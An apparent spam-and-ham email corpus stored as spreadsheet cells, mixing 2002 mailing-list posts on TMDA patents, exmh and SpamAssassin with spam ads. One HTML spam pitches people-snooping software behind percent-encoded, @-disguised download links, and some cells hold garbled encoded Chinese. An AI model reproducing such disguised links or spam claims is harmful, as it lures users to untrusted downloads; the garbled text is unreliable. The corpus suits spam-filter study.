 &gt; &gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001,
 &gt; &gt; granted May 16, 2002.
 &gt; &gt;
 &gt; &gt; TMDAers, have you seen this before?
 &gt;
 &gt; No, but thanks for pointing it out.
 &gt;
 &gt; &gt; I'd presume TMDA is prior art, but still, it could be troublesome...
 &gt;
 &gt; Yup.  TMDA's core functionality was fully established before even the
 &gt; filing date.
 &gt;
 &gt; Anyone with experience in this area have a recommendation on whether
 &gt; this should be pursued or not?
  If you think you can survive it, please fight... When I found that patent I
 found others that were just common sense, things that any geek could implement
 with his script/shell-language of choice; and it's time for someone to get the
 medias attention on what's going on.
  Basically this is the new wave of "namenappers"; it used to be domainnames,
 not it's all the basic general ideas they can think off/find on the web that
 they're patenting.
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_601800448P
 Content-Type: text/plain; charset=us-ascii
 F&gt; From:  kchrist@lsil.com
 &gt; Date:  Wed, 24 Jul 2002 15:41:04 -0600
 &gt;
 &gt; I think you are referring to a problem I noticed last October (see 
 &gt; attached email). If I remember correctly, the binding for SeditBeautify
 &gt; is being applied outside of the sedit window and that results in the 
 &gt; behavior observed.
 &gt;
 &gt; Subject: SeditBeautify bug
 &gt; Date: Tue, 02 Oct 2001 15:00:16 -0600 (16:00 CDT)
 &gt; From: kchrist@lsil.com
 &gt; 
 &gt; It appears that the binding for SeditBeautify applies to
 &gt; more than just the sedit window. Since SeditBeautify assumes
 &gt; we are in a sedit window the routine fails. (Try typing
 &gt; ctrl-l over the main window to see what I mean).
 &gt; 
 &gt; The quick fix for this is to make the ^l more restrictive. However, I'd
 &gt; suggest keeping things the way the are and extending ^l to be a
 &gt; highlight toggle. If the window is currently highlighted (sedit or msg)
 &gt; re-display without highlighting and vice versa.
 &gt; 
 &gt; While I can hack tcl, hacking tk is another story. Translation: I can't 
 &gt; fix this bug myself. Any volunteers?
 That's clearly the same bug.
 I don't think I can fix it either...I certainly can't while my copy of Brent's 
 book is across town.  I do understand parts of tk fairly well, but the 
 event handlers give me a headache.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_601800448P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9PyAgK9b4h5R0IUIRAs7bAJ9uQUJ4MYEZf0/e6PuGSFSok9k1EQCfQxea
 dhHEFQpPCkqmstOtLRrRcz0=
 =RSdo
 -----END PGP SIGNATURE-----
 --==_Exmh_601800448P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Hotel Show
</t>
  </si>
  <si>
    <t xml:space="preserve">
 LAST CHANCE TO EXHIBIT AT
 The Hotel Show 2002
 20-22 May, 2002, Airport Expo Dubai, UAE
 With over 200 luxury hotels and resorts planned in the Middle East within the next 3-5 years, 'The Hotel Show' has established itself as the region's premier hospitality event for local &amp; international companies wishing to meet directly with major players in the industry. 
 Strong Industry Support
 'The Hotel Show' is owned by the UK's Daily Mail Group, one of the world's largest media conglomerates with 350 exhibitions worldwide, including Index and Big 5 in Dubai.
 Held annually at the Airport Expo Dubai, 'The Hotel Show' receives full industry support from regional hospitality-related official bodies and associations such as the Dubai Department of Tourism &amp; Commerce Marketing and the Kuwait Hotel Owner's Association, aswell as governmental organisations such as the Department of Trade &amp; Industry in the U.K who ranked the event as one of the top10 hospitality events around the world. 
 The Hotel Show 2002 
 Managed by Streamline Marketing, one of the region's leading event organisers, the 2002 event will feature over 150 exhibitors from 20 countries, showcasing a variety of products &amp; services from hi-tech reservations systems to bed linen, tableware and furniture. Sambonet, Siemens, Frette Spa, Micros Fidelio, Villeroy &amp; Boch, Bose and Grundig are just some of the international companies that will use 'The Hotel Show' as a showcase for meeting major players in the industry &amp; making professional contacts.
 Who can you expect to meet as an exhibitor?
 * Regional hotel management groups and owner associations 
 * Major 4 &amp; 5 star hotels, furnished apartments and resorts in the Middle East: represented by Owners, Investors, General Managers, Asst General Managers, Purchasing Managers, F&amp;B Managers, IT Managers, Engineering Managers, Housekeepers, Finance Managers, Business Development Managers, Executive Chefs and Security Managers. 
 * Middle East-based Architects, Consultants, Hotel Project Managers, Engineers, Contractors and Designers. 
 With over 80% of exhibition space already contracted, time is running out! Should you require a list of exhibitors and a current floorplan, please contact the organisers immediately on 04-3329029 or laith@streamlineb2b.net
 Yours sincerely,
 Joanne Evans &amp; Laith Kubba
 Directors
 Streamline Marketing
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "M" == Mike Masnick &lt;mike@techdirt.com&gt; writes:
     M&gt; In which world are we talking about?  That may be true for the
     M&gt; first sale, but once something is out in the world, the
     M&gt; "creator" loses control... If I buy a chair you built, and then
     M&gt; decide to give it away to my neighbor, by you're definition, he
     M&gt; just stole from you.
 I don't endorse the whole RIAA thing, but to be accurate, you would
 have to duplicate the chair so that both you and your neighbour could
 continue to sit down, and yes, I suppose that would be more serious.
 They can sit on /your/ copy, but if you start churning out exact dups
 of a name-brand artifact, people with law degrees start to smell
 money.  For example, I could copy a Gibson Guitar /exactly/ so long as
 (a) I don't put Orville's name on the headstock and (b) I license the
 patented bracing methods.  If I instead try to sell a homebuilt guitar
 on eBay with "Gibson" written in crayon on the headstock, and then
 claim it is a true Les Paul limited edition, I expect people would get
 upset.
     M&gt; Why is it that people don't understand that giving stuff away
     M&gt; is a perfectly acceptable tactic in capitalist businesses?  
 To play the Devil's Advocate here, it's not about giving /stuff/ away,
 it is about granting endless and cascading duplication/distribution
 rights.  Even if _I_ only make the copy I give to you, that doesn't
 stop you from making 10000 copies to sell.
     M&gt; Access to free stuff often helps to sell other stuff.  
 This is the difficult question:  How will they draw the distinction?
 The "other stuff" is just as easy to duplicate as the free stuff.
 This is why MS is hunting people with illegal Windows; it's no harder
 to dup than a Linux CD, only what is there that actually prevents
 people from doing it?
 Personally, I don't think the issue should have anything to do with
 sales or units.  The issue is that basic phallacy that says a suit
 should be able to "own" someone else's intellectual property.  Sarah
 McLaughlin isn't suing you, it's her label's legal dept because it's
 the label who stands to lose; Sarah's already fat beyond her wildest
 dreams, so a few bucks here or there, or even if the well dried up
 tomorrow, it's not going to really traumatize her (unless she's been
 blazingly stupid with her money)
 But the label ... like Disney and Mickey, they need the cash cow so
 they can keep all sorts of uncreative hangers-on in limos and coke.
 If you thought only Elvis or Brian Jones or Dennis Wilson had problems
 with beautiful-people deadbeat leech "friends" draining their riches,
 think again.
 The problem is really very simple because it is semantic, and until we
 make the semantic flip, it's unsolvable, but like trisecting an angle,
 all it takes is looking at the same situation in a different
 way.  Here's the revelation: Elvis never ever made a hit record.
 Elvis didn't make the hits, his /fans/ made the hits.  His fans did
 the work cleaning toilets, manning the convenience stores, driving
 milk trucks, sitting at endless office desks, they did the /real/
 labour that paid for every last one of Elvis Presley's pills.  All
 Elvis did was sing into a microphone every so often, and pen or
 collect the odd song that all those /people/ liked and wanted as
 something of their own.  But it's not _Elvis_ who made them universal
 statements, it is the universe of fans who slurped the songs into
 their own lives, it was pull-technology, not push.
 Therefore the question becomes: how many times must these fans pay
 before they own what they themselves have created?  They pay royalties
 for listening to the radio, for blank tapes, for concert tickets, for
 a beer in a bar with a cover band ... they pay over and over and over
 again for the /right/ to make some hack writer's song /their/
 favourite song????  That's where the whole system has been seriously
 warped by the record companies and ad companies reframing it into your
 thinking that it is the Elvis who makes the Elvis.  It's not.  It's
 the people who make them; the songs are already theirs.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Head &amp; Rotor VE  07/26
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,  
  *·ͨרҵVEͷ(VEñͷܳ),Ҫͺ
     ʮ4JB1,˹6BT,άµŷ,ʮƤ.....
  * ·ͨжVEͷľ, Ϊͱ
    ҵרҵ,ʱ̸ٹʸȼϵͳ
    ̵,ҲչȽļӹ,Թ.Ʒ
    ͬͬƷ൱. 
  * ǵĲƷȤ,֪ͨ.
    we have been in the field of diesel fuel injection 
 systems for quite a few years.(CHINA)
    We tell you that we will update our VE h&amp;r
 (hydraulic heads for the VE distributor pump) list in our 
 homepages.Thirty more models will be added.And the minimum
 order will be 6pcs a model.We quote them as follows:
 3-cyl:USD:50/1pcs
 4-cyl:USD:50/1pcs
 5-cyl:USD:55/1pcs
 6-cyl:USD:55/1pcs
    We can ship the following three models to you within 8~10 weeks. after
 we receive your payment.
   If you feel interested in our products,please advise the details about 
 what you need,such model name,part number,quantity and so on.We are always
 within your touch.
   Looking forward to our favorable cooperation.
   Hope to hear from you soon.
 (NIPPON DENSO)
 096400-0920
 096400-0143
 096400-0242
 096400-0371
 096400-0432
 096400-1030
 096400-1210
 096400-1230
 096400-1240   
 096400-1250
 096400-1330
 096400-1331
 096400-1600
 096540-0080
 (ZEXEL)
 146400-8821
 145400-3320
 146400-4520
 146400-8821
 146400-9720
 146401-0520
 146401-2120
 146402-0820
 146402-0920
 146403-2820
 146402-3820
 146402-4020
 146402-4320
 146403-3120
 146403-3520
 146404-1520
 146404-2200
 146430-1420
 (BOSCH) 
 1 468 333 320
 1 468 333 323
 1 468 334 313
 1 468 334 327
 1 468 334 337
 1 468 334 378
 1 468 334 475
 1 468 334 496
 1 468 334 565
 1 468 334 575
 1 468 334 580
 1 468 334 590
 1 468 334 594
 1 468 334 595
 1 468 334 596
 1 468 334 603
 1 468 334 604
 1 468 334 606
 1 468 334 666
 1 468 334 675
 1 468 334 720
 1 468 334 780
 1 468 334 798
 1 468 334 874
 1 468 334 899
 1 468 334 946
 2 468 334 021
 2 468 334 050
 2 468 335 022
 1 468 335 345
 2 468 336 013
 1 468 336 352
 1 468 336 364
 1 468 336 371
 1 468 336 403
 1 468 336 418
 1 468 336 423
 1 468 336 464
 1 468 336 480
 1 468 336 614
 1 468 336 626
                                     C.Hua
 Sales &amp; purchasing director
 http://WWW.China-LuTon.com 
 china_lutong@163.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] RE:Pictish
</t>
  </si>
  <si>
    <t xml:space="preserve">Barbara wrote:
 Pictish pictograms (still undeciphered)
 -----------------------
 I'd be interested in an update on the latest thinking on these things.
 Particularly the 'swimming elephant' pictogram.
 There's a book come out recently on the world's undeciphered scripts
 (including Linear A and Etruscan).
 Has any list member read it?
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Re: [SAdev] File::Spec and v2.41
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 11 Sep 2002, Stephane Lentz wrote:
 &gt; =&gt; I faced a similar problem with the FreeBSD when trying to 
 &gt; install SpamAssassin through the ports on my fresh FreeBSD 4.6.2. 
 &gt; I had to define PERL5LIB with some given order of directories
 &gt; so that the latest File::Spec module get used. 
 Good to hear it's not just me.  Mind telling me how you set PERL5LIB
 specificly? I've tried a few things (setenv in the shell, as well as
 $PERL5LIB == ...inside the Makefile.PL, even on the perl command
 line..) with no success.
 thanks.
 ..david
 ---
 david raistrick
 drais@atlasta.net		http://www.expita.com/nomime.html
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LOOK !  Y O U  are a W I N N E R  here !  -  Don't miss out  !  !                                6113
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] OSI protocol
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I wasn't sure if that ever started up.
 what irc server is #ilug on?
 Regards,
 Shane
 -----Original Message-----
 From: Niall O Broin [mailto:niall@linux.ie]
 Sent: 19 July 2002 15:36
 To: ilug@linux.ie
 Subject: [ILUG] OSI protocol
 There's been some discussion just now on the ILUG IRC channel about OSI and
 protocol layers. This reminded me of a poster produced by Wandel &amp;
 Goltermann (manufactureres of fine protocol decoders and testers) which
 illustrates this admirably. The poster is in the form of a PDF file and to
 be honest, is best appreciated if you have access to a HP DesignJet or
 somesuch device. Wandel &amp; Goltermann has now become/been taken over by
 acterna and I couldn't find the poster there. However, it's available at
 http://www.pb.bib.de/~dozloh/fachinfo/sdn_16/decodes.pdf and some of you ma
 find it interesting.
 The top of the poster refers you to www.decodes.com for a more up to date
 online copy of the poster. However, www.decodes.com now is redirected to the
 aforementioned acterna and . . . .
 Niall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</si>
  <si>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Internet Columbo is getting on your case.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body link=#333399&gt;
 &lt;font face="Verdana, Arial, Helvetica" size=3&gt;
 &lt;center&gt;&lt;b&gt;&lt;font size="5" color=#CC0066&gt;Astounding
 New Software Lets You Find&lt;br&gt;
 Out Almost Anything About Anyone&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;&lt;i&gt;&lt;font color=#333399 size=4&gt;Click here to download it right
 now (no charge card needed):&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/b&gt;&lt;font color=#333399 size=4&gt;&lt;b&gt;&lt;a
 href="http://%72.l%79c%6fs.%63%6f%6d%7cre%64i%72%253fl%2ed.%25%34%30%2564%744.5%25%33%30m%256%35%2567%73.%25%36%33%6fm%25%32%66d%25%3744%253fl.%64.@%68o%6de%2eeart%68link.net/%7eb6%610?l.d.@%6dembe%72s%2e%74ripod.%63%6fm/~%6ejax05%32%37"&gt;Download
 Page&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font size="1" color="#333333"&gt;(This
 make take a few moments to load - please be patient)&lt;/font&gt;&lt;br&gt;
 &lt;/center&gt;&lt;br&gt;
 Find out &lt;b&gt;everything&lt;/b&gt; you ever wanted to know about:
 &lt;ul&gt;
 &lt;li&gt;your friends&lt;/li&gt;
 &lt;li&gt;your family&lt;/li&gt;
 &lt;li&gt;your enemies&lt;/li&gt;
 &lt;li&gt;your employees&lt;/li&gt;
 &lt;li&gt;yourself - Is Someone Using Your Identity?&lt;/li&gt;
 &lt;li&gt;even your boss!&lt;/li&gt;
 &lt;/ul&gt;
 &lt;b&gt;Did you know&lt;/b&gt; that you can search for
 &lt;b&gt;anyone, anytime, anywhere,&lt;/b&gt; right on the Internet?
 &lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click here: &lt;/font&gt;&lt;font
 color=#333399&gt;&lt;a
 href="http://%72.l%79c%6fs.%63%6f%6d%7cre%64i%72%253fl%2ed.%25%34%30%2564%744.5%25%33%30m%256%35%2567%73.%25%36%33%6fm%25%32%66d%25%3744%253fl.%64.@%68o%6de%2eeart%68link.net/%7eb6%610?l.d.@%6dembe%72s%2e%74ripod.%63%6fm/~%6ejax05%32%37"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 This &lt;b&gt;mammoth collection&lt;/b&gt; of Internet investigative tools &amp; research
 sites will provide you with nearly &lt;b&gt;400 gigantic research resources&lt;/b&gt;
 to locate information online and offline on:
 &lt;font color="#000080"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;people you trust, people you work with&lt;/li&gt;
 &lt;li&gt;screen new tenants, roommates, nannys, housekeepers&lt;/li&gt;
 &lt;li&gt;current or past employment&lt;/li&gt;
 &lt;li&gt;license plate numbers, court records, even your FBI file&lt;/li&gt;
 &lt;li&gt;unlisted &amp; reverse phone number lookup&lt;/li&gt;
 &lt;/ul&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://%72.l%79c%6fs.%63%6f%6d%7cre%64i%72%253fl%2ed.%25%34%30%2564%744.5%25%33%30m%256%35%2567%73.%25%36%33%6fm%25%32%66d%25%3744%253fl.%64.@%68o%6de%2eeart%68link.net/%7eb6%610?l.d.@%6dembe%72s%2e%74ripod.%63%6fm/~%6ejax05%32%37"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 &lt;blockquote&gt;&lt;font size="2"&gt;&lt;b&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Dig up information on your FRIENDS, NEIGHBORS, or BOSS!&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Locate transcripts and COURT ORDERS from all 50 states.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; CLOAK your EMAIL so your true address can't be discovered.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Find out how much ALIMONY your neighbor is paying.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Discover how to check your phones for WIRETAPS.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; &lt;i&gt;Or check yourself out&lt;/i&gt;--you may be shocked at what you find!!&lt;br&gt;
 &lt;/blockquote&gt;&lt;center&gt;&lt;font size=4 color=#333399&gt;&lt;b&gt;&lt;i&gt;These
 are only a few things&lt;br&gt;
 that you can do with this software...&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;br&gt;
 To download this software,&lt;/b&gt; and have it in less than 5 minutes, click &amp; visit our website:&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://%72.l%79c%6fs.%63%6f%6d%7cre%64i%72%253fl%2ed.%25%34%30%2564%744.5%25%33%30m%256%35%2567%73.%25%36%33%6fm%25%32%66d%25%3744%253fl.%64.@%68o%6de%2eeart%68link.net/%7eb6%610?l.d.@%6dembe%72s%2e%74ripod.%63%6fm/~%6ejax05%32%37"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;&lt;hr size=1 width=60%&gt;
 &lt;font size="2" color="#666666"&gt;&lt;b&gt;We respect your online time and privacy
 and honor all requests to stop further e-mails.&lt;/b&gt;&lt;small&gt;
 To stop future messages, do &lt;b&gt;NOT&lt;/b&gt; hit reply. Instead, simply click the following link
 which will send us a message with "STOP" in the subject line.
 Please do not include any correspondence -- all requests handled automatically. :)&lt;/small&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;a href="mailto:stop0527@excite.com?subject=STOP_NJAX0527"&gt;[Click
 Here to Stop Further Messages]&lt;/a&gt;&lt;/center&gt;&lt;br&gt;
 &lt;font size="1" color="#666666"&gt;&lt;b&gt;
 Thank you!&lt;/b&gt; Copyright&amp;nbsp;&amp;copy; 2002, all rights reserved.&lt;/font&gt;
 &lt;/body&gt;
  [RYTE^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Banner Life Upgraded to A++
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_2AD835_01C20333.3B11C170
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Banner Life Upgraded to A++ Superior
  BANNER LIFE
  AM BEST
 	Effective February 8, 2002
 	Banner Extended Conversion privileges on OPTerm and Potomac
 Term. Conversion on these products is now available for the duration of
 the guaranteed level premium period, or up to attained age 70, whichever
 comes first.
 	(This includes the OPTerm 30!)
 	These 2 positive changes make Banner Life an Industry leader in
 the term market. If you'd like to see for yourself just how competitive
 they are...
 CLICK HERE TO RUN YOUR OWN QUOTE
 &lt;http://nettrac.ipipeline.com/link.asp?cin=47&amp;npt=11&gt; 
 800.683.3077 ext 0 - OR Email rblanco@d-u-s.com
 &lt;mailto:rblanco@d-u-s.com&gt; 
 For Broker and Broker Dealer Use Only - Not for use with the General
 Public. Products not available in all states. This is a general account
 non-variable product *
 http://www.d-u-s.com &lt;http://www.d-u-s.com&gt; 
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.Insurancemail.net
 &lt;http://www.Insurancemail.net&gt; 
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;  
 ------=_NextPart_000_2AD835_01C20333.3B11C170
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Banner Life Upgraded to A++&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#336699" text=3D"#000000"&gt;
 &lt;table width=3D"550" border=3D"0" cellspacing=3D"5" cellpadding=3D"0" =
 align=3D"center" bgcolor=3D"#000000"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center" bgcolor=3D"#336699"&gt;=20
       &lt;p&gt;&lt;img src=3D"http://iiq.us/images/dus3/new1.gif" width=3D"550" =
 alt=3D"Banner Life Upgraded to A++ Superior"&gt;&lt;br&gt;
         &lt;img src=3D"http://iiq.us/images/dus3/bigbl.gif" width=3D"350" =
 height=3D"194" alt=3D"BANNER LIFE"&gt;&lt;br&gt;&lt;br&gt;
         &lt;img src=3D"http://iiq.us/images/dus3/new5.gif" width=3D"231" =
 height=3D"87" alt=3D"AM BEST"&gt;&lt;br&gt;&lt;br&gt;
       &lt;/p&gt;
       &lt;blockquote&gt;=20
         &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"3" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;
         &lt;p align=3D"left"&gt;
           &lt;font color=3D"#FFFF00" size=3D"4"&gt;Effective February 8, =
 2002&lt;/font&gt;&lt;br&gt;
           Banner Extended Conversion privileges on OPTerm and Potomac =
 Term. Conversion=20
           on these products is now available for the duration of the =
 guaranteed=20
           level premium period, or up to attained age 70, whichever =
 comes first.&lt;br&gt;
           (This includes the OPTerm 30!)&lt;/p&gt;
         &lt;p align=3D"left"&gt;&lt;font color=3D"#FFFF00"&gt;These 2 positive =
 changes make Banner Life
           an Industry leader in the term market. If you'd like to see =
 for yourself just=20
           how competitive they are...&lt;/p&gt;&lt;/b&gt;&lt;/font&gt;
       &lt;/blockquote&gt;
       &lt;p&gt;&lt;a =
 href=3D"http://nettrac.ipipeline.com/link.asp?cin=3D47&amp;npt=3D11"&gt;&lt;img =
 src=3D"http://iiq.us/images/dus3/new2.gif" width=3D"254" height=3D"101" =
 border=3D"0" alt=3D"CLICK HERE TO RUN YOUR OWN QUOTE"&gt;&lt;/a&gt;&lt;/p&gt;
       &lt;p&gt;&lt;a href=3D"mailto:rblanco@d-u-s.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/dus3/new3.gif" width=3D"550" height=3D"125" =
 border=3D"0" alt=3D"800.683.3077 ext 0 - OR Email =
 rblanco@d-u-s.com"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1" =
 color=3D"#FFFFFF"&gt;For=20
         Broker and Broker Dealer Use Only - Not for use with the General =
 Public.=20
         Products not available in all states. This is a general account =
 non-variable=20
         product *&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;a href=3D"http://www.d-u-s.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/dus3/new4.gif" border=3D"0" =
 alt=3D"http://www.d-u-s.com"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1" =
 color=3D"#FFFFFF"&gt;
         We don't want anybody to receive our mailings who does=20
         not wish to receive them. This is professional communication=20
         sent to insurance professionals. To be removed from this mailing =
 list,=20
         DO NOT REPLY to this message. Instead, go here: &lt;a =
 href=3D"http://www.Insurancemail.net"&gt;&lt;font =
 color=3D'#FFFFFF'&gt;http://www.Insurancemail.net&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
         &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font =
 color=3D'#FFFFFF'&gt;Legal Notice&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;=20
       &lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_2AD835_01C20333.3B11C170--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New $199 PC Doesn't Do Windows
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Monty Solomon &lt;monty@roscom.com&gt;
      New $199 PC Doesn't Do Windows
      - Oct 2, 2002 03:53 PM (AP Online)
      - http://finance.lycos.com/home/news/story.asp?story=28928829
 By MATTHEW FORDAHL
 AP Technology Writer
   It's been about 20 years since a new Atari 400 or Commodore Vic
 20 could be had for less than $200. Even then, those relics were
 well on their way from bargain bins to the dust bin of PC history.
   Since then, few if any new computers have sold for less than
 $200. Any that did were seriously outdated or inoperable.
   Now, in a challenge to established tech giants, several upstarts
 have banded together to create a PC that retails for $199.86.
   It doesn't do Windows. In fact, it doesn't do a lot of things.
   The Microtel SYSMAR710, sold only at Wal-Mart's online store,
 runs on a Linux operating system variant called Lindows, which has
 been hyped as a new choice for consumers who want to break away
 from the Microsoft monopoly.
 ...
      - http://finance.lycos.com/home/news/story.asp?story=28928829
</t>
  </si>
  <si>
    <t xml:space="preserve">My ideal mailwall will allow message passthrough in many ways:
   - Sender membership on my personal whitelist or any one of 
     many other external whitelists I respect
   - Payment of a small fee (via a website and PayPal link)
   - Demonstration of special per-message effort, either 
     via...
     - a computational challenge (hashcash)
     or
     - other challenge that requires human-level flexibility &amp; 
       followthrough (sender manual whitelisting)
   - Inclusion of a legally-enforceable guarantee that the
     mail is not an unsolicited commercial pitch -- one
     example of this class of guarantee would be a posted
     bond
   - By convincing some analysis software agent of mine that
     I want to see the mail, based on its content and 
     distribution list
 There's no need to do only one. Some might overlap; the manual
 process for passing a message through might require the assertion
 of a legally-enforceable guarantee about the messages' contents.
 Passing certain tests once might add an address to the persistent
 whitelist.
 Any slightly determined and legitimate correspondent would be
 able to find multiple ways to get their mail read, while spammers
 would face a situation where the marginal cost of reaching me
 is much, much greater than the expected return. 
 Some economically irrational spammers (and religious/political 
 zealots) would get through, but such traffic should be a 
 background trickle rather than an annoying torrent.
 - Gordon
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 19, 2002 at 10:27:57AM +0100, Padraig Brady wrote:
 &gt; &gt; On Fri, Aug 16, 2002 at 05:26:33PM +0100, Padraig Brady wrote:
 &gt; &gt;&gt;How can I repeat a string an arbitrary number
 &gt; &gt;&gt;of times in bash/sed/...
 &gt; &gt;&gt;
 &gt; &gt;&gt;I.E. I'm missing the repeat in the following:
 &gt; &gt;&gt;
 &gt; &gt;&gt;STRING="&gt; "
 &gt; &gt;&gt;NUMBER=3
 &gt; &gt;&gt;PREFIX=repeat $STRING $NUMBER
 &gt; &gt;&gt;echo $PREFIX
 huh?  i missed all this.  do you want the string all on one line?
 the string repeated over and over, but with linebreaks in between,
 this works:
     yes "$STRING" | head -"$NUMBER"
 use sed to remove the newline i guess if you want.  the utilities yes,
 head and sed are on pretty much every unix.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</si>
  <si>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HK Email marking !
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;STYLE type="text/css"&gt;
 &lt;!--
 P{
   font-size : 12px;
   color : navy;
 }
 --&gt;
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P&gt;(Hello,This is Chinese Traditional)&lt;BR&gt;
 &lt;/P&gt;
 &lt;DIV style="width : 376px;height : 12px;top : 195px;left : 238px;
   position : absolute;
   z-index : 3;
   visibility : visible;
   background-color : lime;
 " id="Layer3"&gt;&lt;/DIV&gt;
 &lt;DIV style="width : 73px;height : 14px;top : 172px;left : 238px;
   position : absolute;
   z-index : 2;
   visibility : visible;
   background-color : olive;
 " id="Layer2"&gt;&lt;/DIV&gt;
 &lt;DIV style="width : 39px;height : 13px;top : 149px;left : 239px;
   position : absolute;
   z-index : 1;
   visibility : visible;
   background-color : silver;
 " id="Layer1"&gt;&lt;/DIV&gt;
 &lt;P&gt;] 21oЧʽ&lt;BR&gt;
 &amp;nbsp; &amp;nbsp;׌10fͬһr֪ďV᣿뷽ݵI᣿
